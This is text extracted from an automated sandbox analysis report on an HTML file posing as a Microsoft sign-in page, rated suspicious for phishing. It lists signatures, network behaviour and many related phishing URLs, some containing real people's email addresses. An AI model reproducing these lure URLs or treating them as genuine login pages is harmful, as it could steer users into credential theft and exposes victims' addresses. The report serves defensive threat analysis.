ID: 150203Sample Name:CUsersadminisratorDocumentspagesselfSENDERSharedfile07092019_pdf.html2.htmlCookbook: default.jbsTime: 03:21:16Date: 09/07/2019Version: 26.0.0 Aquamarine

2

44

677788889

99999

101010101010101010101010131515161616171736363638393939394040414343444545454545454646

4646

4

Table of Contents

Table of ContentsAnalysis ReportCUsersadminisratorDocumentspagesselfSENDERSharedfile07092019_pdf.html2.html

OverviewGeneral InformationDetectionConfidenceClassificationAnalysis AdviceMitre Att&ck MatrixSignature Overview

Phishing:Networking:System Summary:

Behavior GraphSimulations

Behavior and APIsAntivirus and Machine Learning Detection

Initial SampleDropped FilesUnpacked PE FilesDomainsURLs

Yara OverviewInitial SamplePCAP (Network Traffic)Dropped FilesMemory DumpsUnpacked PEs

Joe Sandbox View / ContextIPsDomainsASNJA3 FingerprintsDropped Files

ScreenshotsThumbnails

StartupCreated / dropped FilesDomains and IPs

Contacted DomainsURLs from Memory and BinariesContacted IPsPublic

Static File InfoGeneralFile Icon

Network BehaviorTCP PacketsUDP PacketsDNS QueriesDNS AnswersHTTPS Packets

Code ManipulationsStatistics

BehaviorSystem Behavior

Analysis Process: iexplore.exe PID: 4576 Parent PID: 692GeneralFile ActivitiesRegistry Activities

Analysis Process: iexplore.exe PID: 4256 Parent PID: 4576General

Copyright Joe Security LLC 2019 Page 2 of 47

4646

47

File ActivitiesRegistry Activities

Disassembly

Copyright Joe Security LLC 2019 Page 3 of 47

Analysis Report CUsersadminisratorDocumentspagesselfSENDERSharedfile07092019_pdf.html2.html

Overview

General Information

Joe Sandbox Version: 26.0.0 Aquamarine

Analysis ID: 150203

Start date: 09.07.2019

Start time: 03:21:16

Joe Sandbox Product: CloudBasic

Overall analysis duration: 0h 5m 10s

Hypervisor based Inspection enabled: false

Report type: light

Sample file name: CUsersadminisratorDocumentspagesselfSENDERSharedfile07092019_pdf.html2.html

Cookbook file name: default.jbs

Analysis system description: Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113

Number of analysed new started processes analysed: 10

Number of new started drivers analysed: 0

Number of existing processes analysed: 0

Number of existing drivers analysed: 0

Number of injected processes analysed: 0

Technologies: HCA enabledEGA enabledHDC enabledAMSI enabled

Analysis stop reason: Timeout

Detection: SUS

Classification: sus24.phis.winHTML@3/70@11/2

Copyright Joe Security LLC 2019 Page 4 of 47

Cookbook Comments: Adjust boot timeEnable AMSIFound application associated with file extension: .htmlBrowsing link: https://login.microsoftonline.com/common/reprocess?ctx=rqiiaxwro2_tuacfc_mwlscowgdswary4nfiia4hcz2e2a6o3dzeitfx48bp2dee5bewihvg6oiekcompgqe2dtvgglwblqjcxvajkq_govmr5-ozvegrfbj5n2gzlirfsjjvmxromotbg4xfiftlm3rfefowilo7lzfqu--tj7_edr9-epg4olyy6ctcndhkm2btdpisagmrgttp2onue0ughmafgjwxkw4ma6ptoo5r3n1mugoxppg8stl81vju31f1blppsnpakizeormsaub5jhs9cmsrj2stulk7juhfommmtvyrbmxskdhzsepldzbmoiuhozvhvkaoyh7vjqnlszkwmmrtn4r3lzac-rtv5fkcovcfjfdjivgazkj49jbokro3ju0kzh2bfs9qjkxgrafybipsyr1mgsdfkc1u-xeloxandmsgs8yj4lnasferoiqoc8m6p5gisfyzgxmpwt2ypyzltoipzakmjuyfg_dgfve16h2ifbg0l6wtdnz2a_gjs6sndzasqgof0an-mfjxqwent1osky59zx3tpwprfb9cvvfgixxwenwelqmj9tplrgwdm7l4kj8kyg1nzawlxcvsf34wwavk2tbvwz3o2rg4hv--6j06rrwvqk9hkhhbhrnacojwb9iklkppfx1ushz7_azrsapi5xvemoy2wga5begjjdsnwzexct82pyf6381#Browsing link: https://login.live.com/oauth20_authorize.srf?response_type=code&client_id=51483342-085c-4d86-bf88-cf50c7252078&scope=openid+profile+email+offline_access&response_mode=form_post&redirect_uri=https%3a%2f%2flogin.microsoftonline.com%2fcommon%2ffederation%2foauth2&state=rqiiaxwsvw_tubtf4yqnbufqisqyozcbndw_fyso6fba10mj7edybe0lch1_vpgzzmtd8hewihvgyoiekcompgqe2dtvgqmsdkgseuqaghhzu9zlnvpt1tn3uymqus2hdm2wvn2fj3mlo0mgpwbpmzajazbmaaioaqvo7o7ycn7_bfdlz5pwqx83oxexxz_piav-ia6dqp1ex8r9h-n03kzvjpnjnxfdzp9f1e4i4owgfhlevljgxkteoy6oozqr0wwhgzkz8htl81vju31f1blppmnpacizasbdadbrpeyapsesqenzg0tgrhlkkc4yq4nvnhuibory3pqjzqmau9xcnd2tum4zirjjs8ngasyemrzp1hnxjrj-gh14nzimzzzl4pkbzfe_tcz4xnphkkkttwcbsrw7nq5eyzwyi9vckim7wzi6guboeg19pmrtidwyolmnm17q7wuvaibeihgv0gctducwxwa6mjqjtjxaz7czltpavetfla1zi0dhx33ma3ajxdgwas-y2pks7az9k2spzfwozmfofein5n5txovc2240wnm88dx3nd3owughuiwpnuri09lt_kgydvbtlhfr6jyviyvylvbqli5wvoghhdxc3zlxzifv7pfhfplmshzlf--vxp8uthdqj1hosqgkodydcpyejcn1yfnvn-ts261tpivwymtmn0a3ztayjnvuiy4qld-v4ssbhy9l13v9vnwv_5cgcxgssquab1k5tw7-aw2&estsfed=1&uaid=64d4ac74f6bf483c8de40b4ceaf2d3bd&signup=1&lw=1&fl=easi2&fci=4345a7b9-9a63-4910-a426-35363201d503&mkt=en-usBrowsing link: https://www.microsoft.com/en-us/servicesagreement/Browsing link: https://privacy.microsoft.com/en-us/privacystatementBrowsing link: file:///c:/users/user/desktop/cusersadminisratordocumentspagesselfsendersharedfile07092019_pdf.html2.html#

Copyright Joe Security LLC 2019 Page 5 of 47

Warnings:

Detection

Strategy Score Range Reporting Whitelisted Detection

Threshold 24 0 - 100 false

Exclude process from analysis (whitelisted): MpCmdRun.exe, sc.exe, ielowutil.exe, WMIADAP.exe, conhost.exe, CompatTelRunner.exeTCP Packets have been reduced to 100Excluded IPs from analysis (whitelisted): 2.19.38.59, 95.100.79.183, 205.185.208.52, 40.126.9.66, 40.126.9.6, 20.190.137.98, 40.126.9.8, 20.190.137.96, 13.107.246.10, 40.90.23.229, 40.90.23.224, 40.90.23.239, 20.190.129.1, 40.126.1.135, 40.126.1.167, 40.126.1.129, 23.54.112.134, 23.54.112.217, 23.10.249.10, 23.10.249.11, 152.199.19.160, 23.10.249.48, 23.10.249.27, 2.19.39.63, 152.199.19.161, 67.27.237.126, 8.248.125.254, 67.27.233.126, 67.27.235.126, 8.248.141.254, 93.184.221.240Excluded domains from analysis (whitelisted): cds.s5x3j6q5.hwcdn.net, wut.smartscreen.microsoft.com, assets.onestore.ms.edgekey.net, wut.abuse.msa.microsoft.com.nsatc.net, i.s-microsoft.com.edgekey.net, uhf.microsoft.com.edgekey.net, e11290.dspg.akamaiedge.net, Edge-Prod-AMSr3.ctrl.t-0001.t-msedge.net, www.microsoft.com-c-3.edgekey.net, login.live.com, audownload.windowsupdate.nsatc.net, hlb.apr-52dd2-0.edgecastdns.net, standard.t-0001.t-msedge.net, acctcdnvzeuno.azureedge.net, acctcdnvzeuno.ec.azureedge.net, e10583.dspg.akamaiedge.net, uhf.microsoft.com, aadcdnoriginwus2.azureedge.net, secure.aadcdn.microsoftonline-p.com.edgekey.net, t-0001.t-msedge.net, assets.onestore.ms.akadns.net, c-s.cms.ms.akadns.net, account.msa.akadns6.net, aadcdnoriginwus2.afd.azureedge.net, e11095.dspg.akamaiedge.net, c.s-microsoft.com-c.edgekey.net, privacy.microsoft.com.edgekey.net, www.prd.aa.aadg.windows.net.nsatc.net, cs9.wpc.v0cdn.net, lgin.msa.trafficmanager.net, www.prd.aa.aadg.akadns.net, afd.t-0001.t-msedge.net, i.s-microsoft.com, a1449.dscg2.akamai.net, acctcdn.trafficmanager.net, wu.azureedge.net, www.prdtm.aadg.windows.net.nsatc.net, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net, iecvlist.microsoft.com, go.microsoft.com, mscomajax.vo.msecnd.net, cs11.wpc.v0cdn.net, e13761.dscg.akamaiedge.net, auto.au.download.windowsupdate.com.c.footprint.net, wu.wpc.apr-52dd2.edgecastdns.net, cs22.wpc.v0cdn.net, ie9comview.vo.msecnd.net, wu.ec.azureedge.net, ctldl.windowsupdate.com, www.prdtm.aadg.akadns.net, c.s-microsoft.com, privacy.microsoft.com, go.microsoft.com.edgekey.net, a849.dscg2.akamai.net, fe-bl02p-msa.trafficmanager.net, e13678.dscg.akamaiedge.net, www.microsoft.com, e13678.dspb.akamaiedge.netReport size getting too big, too many NtDeviceIoControlFile calls found.

Show All

Copyright Joe Security LLC 2019 Page 6 of 47

Confidence

Strategy Score Range Further Analysis Required? Confidence

Threshold 4 0 - 5 false

Analysis Advice

Ransomware

Spreading

Phishing

Banker

Trojan / Bot

Adware

Spyware

Exploiter

Evader

Miner

clean

clean

clean

clean

clean

clean

clean

suspicious

suspicious

suspicious

suspicious

suspicious

suspicious

suspicious

malicious

malicious

malicious

malicious

malicious

malicious

malicious

Classification

Copyright Joe Security LLC 2019 Page 7 of 47

Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis

Mitre Att&ck Matrix

Initial Access Execution PersistencePrivilegeEscalation

DefenseEvasion

CredentialAccess Discovery

LateralMovement Collection Exfiltration

Command andControl

Valid Accounts WindowsRemoteManagement

WinlogonHelper DLL

Port Monitors File SystemLogical Offsets

CredentialDumping

File andDirectoryDiscovery 1

ApplicationDeploymentSoftware

Data from LocalSystem

DataEncrypted 1

StandardCryptographicProtocol 2

ReplicationThroughRemovableMedia

ServiceExecution

Port Monitors AccessibilityFeatures

Binary Padding NetworkSniffing

ApplicationWindowDiscovery

Remote Services Data fromRemovableMedia

Exfiltration OverOther NetworkMedium

Standard Non-Application LayerProtocol 2

Drive-byCompromise

WindowsManagementInstrumentation

AccessibilityFeatures

PathInterception

Rootkit InputCapture

Query Registry WindowsRemoteManagement

Data fromNetwork SharedDrive

AutomatedExfiltration

StandardApplication LayerProtocol 2

Signature Overview

• Phishing

• Networking

• System Summary

Click to jump to signature section

Phishing:

Phishing site detected (based on favicon image match)

Found iframes

HTML body contains low number of good links

HTML title does not match URL

None HTTPS page querying sensitive user data (password, username or email)

Submit button contains javascript call

Suspicious form URL found

META author tag missing

META copyright tag missing

Networking:

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Found strings which match to known social media urls

Performs DNS lookups

Urls found in memory or binary data

Uses HTTPS

Copyright Joe Security LLC 2019 Page 8 of 47

System Summary:

Classification label

Creates files inside the user directory

Creates temporary files

Reads ini files

Spawns processes

Found graphical window changes (likely an installer)

Uses new MSVCR Dlls

Behavior Graph

ID: 150203

Sample: CUsersadminisratorDocuments...

Startdate: 09/07/2019

Architecture: WINDOWS

Score: 24

secure.aadcdn.microsoftonline-p.com

Phishing site detected(based on favicon image

match)

iexplore.exe

6 84

started

iexplore.exe

104

started

aa-hip-prod.southcentralus.cloudapp.azure.com

104.215.74.84, 443, 49733, 49734

unknown

United States

cs1227.wpc.alphacdn.net

192.229.221.185, 443, 49725, 49726

unknown

United States

13 other IPs or domains

Legend:

Process

Signature

Created File

DNS/IP Info

Is Dropped

Is Windows Process

Number of created Registry Values

Number of created Files

Visual Basic

Delphi

Java

.Net C# or VB.NET

C, C++ or other language

Is malicious

Internet

Hide Legend

No simulations

Behavior Graph

Simulations

Behavior and APIs

Antivirus and Machine Learning Detection

Initial Sample

Copyright Joe Security LLC 2019 Page 9 of 47

Source Detection Scanner Label Link

CUsersadminisratorDocumentspagesselfSENDERSharedfile07092019_pdf.html2.html 6% virustotal Browse

No Antivirus matches

No Antivirus matches

No Antivirus matches

Source Detection Scanner Label Link

https://login.microsof/Desktop/CUsersadminisratorDocumentspagesselfSENDERSharedfile07092019_pdf.html

0% Avira URL Cloud safe

https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/ux.converged.error.core.min_2y6puv-fhesw6oymb-

0% Avira URL Cloud safe

https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/ux.converged.error.strings-en.min_xqvbwocyraoe

0% Avira URL Cloud safe

No yara matches

No yara matches

No yara matches

No yara matches

No yara matches

Match Associated Sample Name / URL SHA 256 Detection Link Context

192.229.221.185 Skype Business VM.pdf Get hash malicious Browse

https://jglshop.com.br/?y=ZGFtaWVuY0BhdXN0cmFsaWFuYmFsbGV0LmNvbS5hdQ==&data=02|01|bob@australianballet.com.au|0ada4032a36546c6d13b08d6ac0f8494|363ab79152b7474a91175bf36bde2b94|0|0|636885580035963490&sdata=+0eEs7qSCBrK5wHALHN4ZON9LKqFQEk8Liayanza9jQ=&reserved=0

Get hash malicious Browse

Dropped Files

Unpacked PE Files

Domains

URLs

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Joe Sandbox View / Context

IPs

Copyright Joe Security LLC 2019 Page 10 of 47

New Seccure File 7.24.05 PM.xlsx Get hash malicious Browse

https://storage.googleapis.com/aoffice365-journalistically-202255390/index.html

Get hash malicious Browse

Ceisa Semo Proposal.pdf Get hash malicious Browse

hasib-musinbegovic.com/wp-includes/OneDrive/Secure/home.html

Get hash malicious Browse

https://1drv.ms/b/s!Ai3YLFZQP4zmgnQbLlTwyMGNlcOa Get hash malicious Browse

https://login-microsoftonline-com0compliance-security-alert.ml/sharepoint-online-policies/

Get hash malicious Browse

https://u10520081.ct.sendgrid.net/wf/click?upn=jYlCtn5-2BPW5ucXpaCyqStVH3HEQUa2UKlpMzTVoldFM-3D_9mVef8XBOHUAB1Yp8VbE5b6cE7OrBvd4swG8dKZc1sPHvUY2cvsa2domirFVgsA7wTpafr9ZcbLjQDgrwzRN1Sfz5gUDTAosURfQrkaiHQa9xhTrZ7vxiPsOVhaDJBvhQGmXib5DzN3yHHWyi1-2Bs4dHWxanwSL0UHC4LH5kW-2BXt-2F7dR3iEvUlCpV-2Bigo7RxS8gDytzsBNig0TTG2iACzti9Cn3fcuAB9gNnTJ0mFlqA-3D

Get hash malicious Browse

https://1drv.ms/b/s!AhJu8bKGuybLclKouKsoIXrGDx8 Get hash malicious Browse

https://user7779793e792782.z14.web.core.windows.net/index.htm?=en-US&username=broberts@vocera.com

Get hash malicious Browse

login.live.com.office.flagstarbancorp.myshn.net Get hash malicious Browse

https://aus01.safelinks.protection.outlook.com/?url=https%3A%2F%2Fonedrive.live.com%2Fredir%3Fresid%3D429413BE603FA343!5758%26authkey%3D!ABt3LPTU6MynWOk%26ithint%3Dfile%252cdocx&data=02%7C01%7Cdamienc%40australianballet.com.au%7Cf3dff5c1c69746509e0c08d6ef0bf767%7C363ab79152b7474a91175bf36bde2b94%7C0%7C0%7C636959232091196729&sdata=9I2tuU2dOpmt0o7AgOaq9Wuz9mjMhKAd7LA55pbkQqQ%3D&reserved=0

Get hash malicious Browse

https://1drv.ms/b/s!AvO7bN5acODYawc9teh52z5A8HI?e=3T7pcW

Get hash malicious Browse

https://outlookloffice365user23k-secondary.z14.web.core.windows.net/d41d8cd98f00b204e9800998ecf8427e89de54095edc1a5eb8c27bdf9c492019/89de54095edc1a5eb8c27bdf9c492019/#GBabineau@99restaurants.com

Get hash malicious Browse

https://onedrive.live.com/?authkey=%21AGoRsXinDPWY5Mc&cid=4694365C78123852&id=4694365C78123852%21134&parId=root&o=OneUp

Get hash malicious Browse

www.housewittorp.com/wp-includes/images/crystal/of_nw/of_nw20-10-2019/off.sss/786f23d16213fff8ba639cedee5f69a8/login.htm?cmd=login_submit&id=bbe3bfe87c61dd28e1a018fb1af599aabbe3bfe87c61dd28e1a018fb1af599aa&session=bbe3bfe87c61dd28e1a018fb1af599aabbe3bfe87c61dd28e1a018fb1af599aa

Get hash malicious Browse

https://943d.app.link/ Get hash malicious Browse

https://protection.office.com/threatexplorer#/threatexplorer?dltarget=Explorer&dlstorage=Url&viewid=allemail&query-CanonicalizedUrl=https://onedrive.live.com/?authkey=%21AKOGMaypqRvjuxE&cid=30A2F54D2B9B8460&id=30A2F54D2B9B8460%21170&parId=root&o=OneUp

Get hash malicious Browse

CRY INV#98634.htm Get hash malicious Browse

104.215.74.84 #43409.htm Get hash malicious Browse

email.veromailer.com/c/eJxdkMFugzAQRL8GLlGQbSDAgUPaJJdKVQ-VckSOvYFNjU1th6h_X0OVlFbyYTUz3nlawfuBY6uj_MmCwAFB-0aanmOQdvXPlAjTx-I3CUFUjbueLiD8FDuCChGIZc3TklTL7Mgtco9mXvdstLdGxVgzQitCaUEpI_kmocmuymlOM7LPSEqzwz7KyAh2qldgZ4CuFqUs5AkyCC2QZtU5o1IUrKCFZJJzuuxd0EWsfLMwItwiVq3urKruvB9clG4jdghPmRb12nXcwmBQ-3STa-PxjGLGd0n7GVLmHAQI3jrQPcxgxLb-uFreG4UjBPh2Iv9_uMGaCarRvIeJ7OUCynVXtzpy16FuvdGrd2OUW37yX8McfoWbU-A92D8u9IPiHh47l-Z9bFBOVp4WZcG-AZIwqJQ

Get hash malicious Browse

Match Associated Sample Name / URL SHA 256 Detection Link Context

Copyright Joe Security LLC 2019 Page 11 of 47

email.veromailer.com/c/eJxdkMFugzAQRL8GLlGQbSDAgUPaJJdKVQ-VckSOvYFNjU1th6h_X0OVlFbyYTUz3nlawfuBY6uj_MmCwAFB-0aanmOQdvXPlAjTx-I3CUFUjbueLiD8FDuCChGIZc3TklTL7Mgtco9mXvdstLdGxVgzQitCaUEpI_kmocmuymlOM7LPSEqzwz7KyAh2qldgZ4CuFqUs5AkyCC2QZtU5o1IUrKCFZJJzuuxd0EWsfLMwItwiVq3urKruvB9clG4jdghPmRb12nXcwmBQ-3STa-PxjGLGd0n7GVLmHAQI3jrQPcxgxLb-uFreG4UjBPh2Iv9_uMGaCarRvIeJ7OUCynVXtzpy16FuvdGrd2OUW37yX8McfoWbU-A92D8u9IPiHh47l-Z9bFBOVp4WZcG-AZIwqJQ

Get hash malicious Browse

https://exchange3564.xyz/.d/?email Get hash malicious Browse

Skype Business VM.pdf Get hash malicious Browse

https://u10269907.ct.sendgrid.net/wf/click?upn=7TnevfDNdxZp2Q3ysQ7X3oESB0-2FDPAHHGrCSuhANFl0RiIaXTQqc14zMc-2FpX9M8w_fxDop4UK-2FXWtvz-2Fo4SgBilCRDsINTKa-2BV6WoX7TCamBzN4Y3OFVxfYIFnMjo2oF0yanJFKyei-2FKbXVFZy2wWdw2BISVfQ0uuj040ducQ3e4x0ReqX-2BeavUyA3qBOBoptIxux6KHZnY0imx8tUJ6aPUBf7V4AQsKN3qI-2FJUs5ka5TGYo3JtEVvh56ieL-2BftMts8GVieoN5pgiQgMOSfl-2FS3as8UhjMRUwml-2Btsxw6bkw-3D

Get hash malicious Browse

86741.com/image/index.html Get hash malicious Browse

https://storage.googleapis.com/aoffice365-journalistically-202255390/index.html

Get hash malicious Browse

hasib-musinbegovic.com/wp-includes/OneDrive/Secure/home.html

Get hash malicious Browse

https://login-microsoftonline-com0compliance-security-alert.ml/sharepoint-online-policies/

Get hash malicious Browse

https://u10520081.ct.sendgrid.net/wf/click?upn=jYlCtn5-2BPW5ucXpaCyqStVH3HEQUa2UKlpMzTVoldFM-3D_9mVef8XBOHUAB1Yp8VbE5b6cE7OrBvd4swG8dKZc1sPHvUY2cvsa2domirFVgsA7wTpafr9ZcbLjQDgrwzRN1Sfz5gUDTAosURfQrkaiHQa9xhTrZ7vxiPsOVhaDJBvhQGmXib5DzN3yHHWyi1-2Bs4dHWxanwSL0UHC4LH5kW-2BXt-2F7dR3iEvUlCpV-2Bigo7RxS8gDytzsBNig0TTG2iACzti9Cn3fcuAB9gNnTJ0mFlqA-3D

Get hash malicious Browse

https://user7779793e792782.z14.web.core.windows.net/index.htm?=en-US&username=broberts@vocera.com

Get hash malicious Browse

parsintelligent.com/layouts/joomla/content/OFFICE01/office.htm

Get hash malicious Browse

email.veromailer.com/c/eJxdkMFugzAQRL8GLlGQbSDAgUPaJJdKVQ-VckSOvYFNjU1th6h_X0OVlFbyYTUz3nlawfuBY6uj_MmCwAFB-0aanmOQdvXPlAjTx-I3CUFUjbueLiD8FDuCChGIZc3TklTL7Mgtco9mXvdstLdGxVgzQitCaUEpI_kmocmuymlOM7LPSEqzwz7KyAh2qldgZ4CuFqUs5AkyCC2QZtU5o1IUrKCFZJJzuuxd0EWsfLMwItwiVq3urKruvB9clG4jdghPmRb12nXcwmBQ-3STa-PxjGLGd0n7GVLmHAQI3jrQPcxgxLb-uFreG4UjBPh2Iv9_uMGaCarRvIeJ7OUCynVXtzpy16FuvdGrd2OUW37yX8McfoWbU-A92D8u9IPiHh47l-Z9bFBOVp4WZcG-AZIwqJQ

Get hash malicious Browse

https://xoaoomoaiaopeamoznoiaib.appspot.com/bdsa/ Get hash malicious Browse

email.veromailer.com/c/eJxdkMFugzAQRL8GLlGQbSDAgUPaJJdKVQ-VckSOvYFNjU1th6h_X0OVlFbyYTUz3nlawfuBY6uj_MmCwAFB-0aanmOQdvXPlAjTx-I3CUFUjbueLiD8FDuCChGIZc3TklTL7Mgtco9mXvdstLdGxVgzQitCaUEpI_kmocmuymlOM7LPSEqzwz7KyAh2qldgZ4CuFqUs5AkyCC2QZtU5o1IUrKCFZJJzuuxd0EWsfLMwItwiVq3urKruvB9clG4jdghPmRb12nXcwmBQ-3STa-PxjGLGd0n7GVLmHAQI3jrQPcxgxLb-uFreG4UjBPh2Iv9_uMGaCarRvIeJ7OUCynVXtzpy16FuvdGrd2OUW37yX8McfoWbU-A92D8u9IPiHh47l-Z9bFBOVp4WZcG-AZIwqJQ

Get hash malicious Browse

https://similarities.ga/aim/redirect.php Get hash malicious Browse

www.housewittorp.com/wp-includes/images/crystal/of_nw/of_nw20-10-2019/off.sss/786f23d16213fff8ba639cedee5f69a8/login.htm?cmd=login_submit&id=bbe3bfe87c61dd28e1a018fb1af599aabbe3bfe87c61dd28e1a018fb1af599aa&session=bbe3bfe87c61dd28e1a018fb1af599aabbe3bfe87c61dd28e1a018fb1af599aa

Get hash malicious Browse

https://mofainriao837zaopzxoas.appspot.com/bbvx/ Get hash malicious Browse

Match Associated Sample Name / URL SHA 256 Detection Link Context

Copyright Joe Security LLC 2019 Page 12 of 47

https://943d.app.link/ Get hash malicious Browse

Match Associated Sample Name / URL SHA 256 Detection Link Context

Match Associated Sample Name / URL SHA 256 Detection Link Context

aa-hip-prod.southcentralus.cloudapp.azure.com

#43409.htm Get hash malicious Browse 104.215.74.84

email.veromailer.com/c/eJxdkMFugzAQRL8GLlGQbSDAgUPaJJdKVQ-VckSOvYFNjU1th6h_X0OVlFbyYTUz3nlawfuBY6uj_MmCwAFB-0aanmOQdvXPlAjTx-I3CUFUjbueLiD8FDuCChGIZc3TklTL7Mgtco9mXvdstLdGxVgzQitCaUEpI_kmocmuymlOM7LPSEqzwz7KyAh2qldgZ4CuFqUs5AkyCC2QZtU5o1IUrKCFZJJzuuxd0EWsfLMwItwiVq3urKruvB9clG4jdghPmRb12nXcwmBQ-3STa-PxjGLGd0n7GVLmHAQI3jrQPcxgxLb-uFreG4UjBPh2Iv9_uMGaCarRvIeJ7OUCynVXtzpy16FuvdGrd2OUW37yX8McfoWbU-A92D8u9IPiHh47l-Z9bFBOVp4WZcG-AZIwqJQ

Get hash malicious Browse 104.215.74.84

email.veromailer.com/c/eJxdkMFugzAQRL8GLlGQbSDAgUPaJJdKVQ-VckSOvYFNjU1th6h_X0OVlFbyYTUz3nlawfuBY6uj_MmCwAFB-0aanmOQdvXPlAjTx-I3CUFUjbueLiD8FDuCChGIZc3TklTL7Mgtco9mXvdstLdGxVgzQitCaUEpI_kmocmuymlOM7LPSEqzwz7KyAh2qldgZ4CuFqUs5AkyCC2QZtU5o1IUrKCFZJJzuuxd0EWsfLMwItwiVq3urKruvB9clG4jdghPmRb12nXcwmBQ-3STa-PxjGLGd0n7GVLmHAQI3jrQPcxgxLb-uFreG4UjBPh2Iv9_uMGaCarRvIeJ7OUCynVXtzpy16FuvdGrd2OUW37yX8McfoWbU-A92D8u9IPiHh47l-Z9bFBOVp4WZcG-AZIwqJQ

Get hash malicious Browse 104.215.74.84

https://exchange3564.xyz/.d/?email Get hash malicious Browse 104.215.74.84

Skype Business VM.pdf Get hash malicious Browse 104.215.74.84

https://u10269907.ct.sendgrid.net/wf/click?upn=7TnevfDNdxZp2Q3ysQ7X3oESB0-2FDPAHHGrCSuhANFl0RiIaXTQqc14zMc-2FpX9M8w_fxDop4UK-2FXWtvz-2Fo4SgBilCRDsINTKa-2BV6WoX7TCamBzN4Y3OFVxfYIFnMjo2oF0yanJFKyei-2FKbXVFZy2wWdw2BISVfQ0uuj040ducQ3e4x0ReqX-2BeavUyA3qBOBoptIxux6KHZnY0imx8tUJ6aPUBf7V4AQsKN3qI-2FJUs5ka5TGYo3JtEVvh56ieL-2BftMts8GVieoN5pgiQgMOSfl-2FS3as8UhjMRUwml-2Btsxw6bkw-3D

Get hash malicious Browse 104.215.74.84

86741.com/image/index.html Get hash malicious Browse 104.215.74.84

https://storage.googleapis.com/aoffice365-journalistically-202255390/index.html

Get hash malicious Browse 104.215.74.84

hasib-musinbegovic.com/wp-includes/OneDrive/Secure/home.html

Get hash malicious Browse 104.215.74.84

https://login-microsoftonline-com0compliance-security-alert.ml/sharepoint-online-policies/

Get hash malicious Browse 104.215.74.84

https://u10520081.ct.sendgrid.net/wf/click?upn=jYlCtn5-2BPW5ucXpaCyqStVH3HEQUa2UKlpMzTVoldFM-3D_9mVef8XBOHUAB1Yp8VbE5b6cE7OrBvd4swG8dKZc1sPHvUY2cvsa2domirFVgsA7wTpafr9ZcbLjQDgrwzRN1Sfz5gUDTAosURfQrkaiHQa9xhTrZ7vxiPsOVhaDJBvhQGmXib5DzN3yHHWyi1-2Bs4dHWxanwSL0UHC4LH5kW-2BXt-2F7dR3iEvUlCpV-2Bigo7RxS8gDytzsBNig0TTG2iACzti9Cn3fcuAB9gNnTJ0mFlqA-3D

Get hash malicious Browse 104.215.74.84

https://user7779793e792782.z14.web.core.windows.net/index.htm?=en-US&username=broberts@vocera.com

Get hash malicious Browse 104.215.74.84

parsintelligent.com/layouts/joomla/content/OFFICE01/office.htm

Get hash malicious Browse 104.215.74.84

email.veromailer.com/c/eJxdkMFugzAQRL8GLlGQbSDAgUPaJJdKVQ-VckSOvYFNjU1th6h_X0OVlFbyYTUz3nlawfuBY6uj_MmCwAFB-0aanmOQdvXPlAjTx-I3CUFUjbueLiD8FDuCChGIZc3TklTL7Mgtco9mXvdstLdGxVgzQitCaUEpI_kmocmuymlOM7LPSEqzwz7KyAh2qldgZ4CuFqUs5AkyCC2QZtU5o1IUrKCFZJJzuuxd0EWsfLMwItwiVq3urKruvB9clG4jdghPmRb12nXcwmBQ-3STa-PxjGLGd0n7GVLmHAQI3jrQPcxgxLb-uFreG4UjBPh2Iv9_uMGaCarRvIeJ7OUCynVXtzpy16FuvdGrd2OUW37yX8McfoWbU-A92D8u9IPiHh47l-Z9bFBOVp4WZcG-AZIwqJQ

Get hash malicious Browse 104.215.74.84

https://xoaoomoaiaopeamoznoiaib.appspot.com/bdsa/ Get hash malicious Browse 104.215.74.84

Domains

Copyright Joe Security LLC 2019 Page 13 of 47

email.veromailer.com/c/eJxdkMFugzAQRL8GLlGQbSDAgUPaJJdKVQ-VckSOvYFNjU1th6h_X0OVlFbyYTUz3nlawfuBY6uj_MmCwAFB-0aanmOQdvXPlAjTx-I3CUFUjbueLiD8FDuCChGIZc3TklTL7Mgtco9mXvdstLdGxVgzQitCaUEpI_kmocmuymlOM7LPSEqzwz7KyAh2qldgZ4CuFqUs5AkyCC2QZtU5o1IUrKCFZJJzuuxd0EWsfLMwItwiVq3urKruvB9clG4jdghPmRb12nXcwmBQ-3STa-PxjGLGd0n7GVLmHAQI3jrQPcxgxLb-uFreG4UjBPh2Iv9_uMGaCarRvIeJ7OUCynVXtzpy16FuvdGrd2OUW37yX8McfoWbU-A92D8u9IPiHh47l-Z9bFBOVp4WZcG-AZIwqJQ

Get hash malicious Browse 104.215.74.84

https://similarities.ga/aim/redirect.php Get hash malicious Browse 104.215.74.84

www.housewittorp.com/wp-includes/images/crystal/of_nw/of_nw20-10-2019/off.sss/786f23d16213fff8ba639cedee5f69a8/login.htm?cmd=login_submit&id=bbe3bfe87c61dd28e1a018fb1af599aabbe3bfe87c61dd28e1a018fb1af599aa&session=bbe3bfe87c61dd28e1a018fb1af599aabbe3bfe87c61dd28e1a018fb1af599aa

Get hash malicious Browse 104.215.74.84

https://mofainriao837zaopzxoas.appspot.com/bbvx/ Get hash malicious Browse 104.215.74.84

https://943d.app.link/ Get hash malicious Browse 104.215.74.84

cs1227.wpc.alphacdn.net Skype Business VM.pdf Get hash malicious Browse 192.229.221.185

https://jglshop.com.br/?y=ZGFtaWVuY0BhdXN0cmFsaWFuYmFsbGV0LmNvbS5hdQ==&data=02|01|bob@australianballet.com.au|0ada4032a36546c6d13b08d6ac0f8494|363ab79152b7474a91175bf36bde2b94|0|0|636885580035963490&sdata=+0eEs7qSCBrK5wHALHN4ZON9LKqFQEk8Liayanza9jQ=&reserved=0

Get hash malicious Browse 192.229.221.185

New Seccure File 7.24.05 PM.xlsx Get hash malicious Browse 192.229.221.185

https://storage.googleapis.com/aoffice365-journalistically-202255390/index.html

Get hash malicious Browse 192.229.221.185

Ceisa Semo Proposal.pdf Get hash malicious Browse 192.229.221.185

hasib-musinbegovic.com/wp-includes/OneDrive/Secure/home.html

Get hash malicious Browse 192.229.221.185

https://1drv.ms/b/s!Ai3YLFZQP4zmgnQbLlTwyMGNlcOa Get hash malicious Browse 192.229.221.185

https://login-microsoftonline-com0compliance-security-alert.ml/sharepoint-online-policies/

